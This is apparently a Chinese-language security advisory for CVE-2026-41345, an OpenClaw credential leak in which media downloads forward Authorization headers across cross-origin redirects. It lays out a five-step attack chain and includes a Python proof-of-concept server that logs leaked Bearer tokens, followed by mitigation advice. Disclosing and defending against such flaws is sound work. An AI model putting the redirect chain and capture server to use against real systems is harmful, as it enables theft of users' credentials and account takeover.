CVE-2026-41345 CVSS 5.3 中危

CVE-2026-41345 OpenClaw凭据泄露漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41345

漏洞类型

凭据泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.31之前版本存在凭据泄露漏洞。该漏洞出现在媒体下载功能中，当系统处理跨源重定向请求时，错误地将包含敏感信息的Authorization头转发给了第三方目标服务器。攻击者可利用此缺陷，精心构造恶意的重定向链接链，诱导系统将合法用户的授权凭证发送至受控服务器，从而导致凭证被窃取和账户被非法接管。

技术细节

该漏洞的根本原因是OpenClaw在实现HTTP客户端重定向逻辑时，违反了安全最佳实践。通常情况下，为了防止凭据泄露，Authorization头不应跟随跨源重定向。然而，在受影响的OpenClaw版本中，媒体下载组件在接收到301或302重定向响应时，未对目标域名的可信度进行校验，也未对敏感请求头进行剥离。它直接保留了原始请求中的Authorization头，并向Location字段指定的新地址发起请求。攻击者只需提供一个指向恶意服务器的重定向入口，OpenClaw便会充当中间人，将受害者的API密钥或Bearer Token直接泄露给攻击者，进而实现未授权访问。

攻击链分析

STEP 1

1. 侦察与准备

攻击者识别出OpenClaw实例，并搭建一个恶意服务器，用于接收泄露的HTTP头信息。

STEP 2

2. 构造恶意链接

攻击者创建一个URL，该URL指向OpenClaw的媒体下载功能，并诱导该功能发起一个指向攻击者控制的中转服务器的请求。

STEP 3

3. 触发重定向

中转服务器返回HTTP 302重定向响应，将Location指向攻击者的凭证捕获服务器。

STEP 4

4. 凭据泄露

OpenClaw在处理重定向时，错误地将原始请求中的Authorization头附加到新的目标请求中并发送给攻击者服务器。

STEP 5

5. 利用凭据

攻击者服务器记录下Authorization头（如Bearer Token），并利用该凭证冒充合法用户访问系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# This is a conceptual PoC for the server side capturing the leaked credentials.
# Attacker sets up a listener to catch the Authorization header.

import http.server
import socketserver

class CaptureHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Extract the Authorization header from the victim's request
        auth_header = self.headers.get('Authorization')
        
        if auth_header:
            print(f"[+] Captured Leaked Credential: {auth_header}")
            response = b"Credentials captured by attacker."
        else:
            print("[-] No credentials found in this request.")
            response = b"No credentials."
            
        # Send response
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(response)

# Start the malicious server on port 8080
PORT = 8080
with socketserver.TCPServer(("0.0.0.0", PORT), CaptureHandler) as httpd:
    print(f" Malicious server listening on port {PORT}...")
    print(f" Waiting for OpenClaw to redirect requests here...")
    httpd.serve_forever()

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

建议在无法立即升级的情况下，通过代理或防火墙规则临时阻断OpenClaw实例向未知或不可信域名发起的出站连接，并监控媒体下载功能的异常网络流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表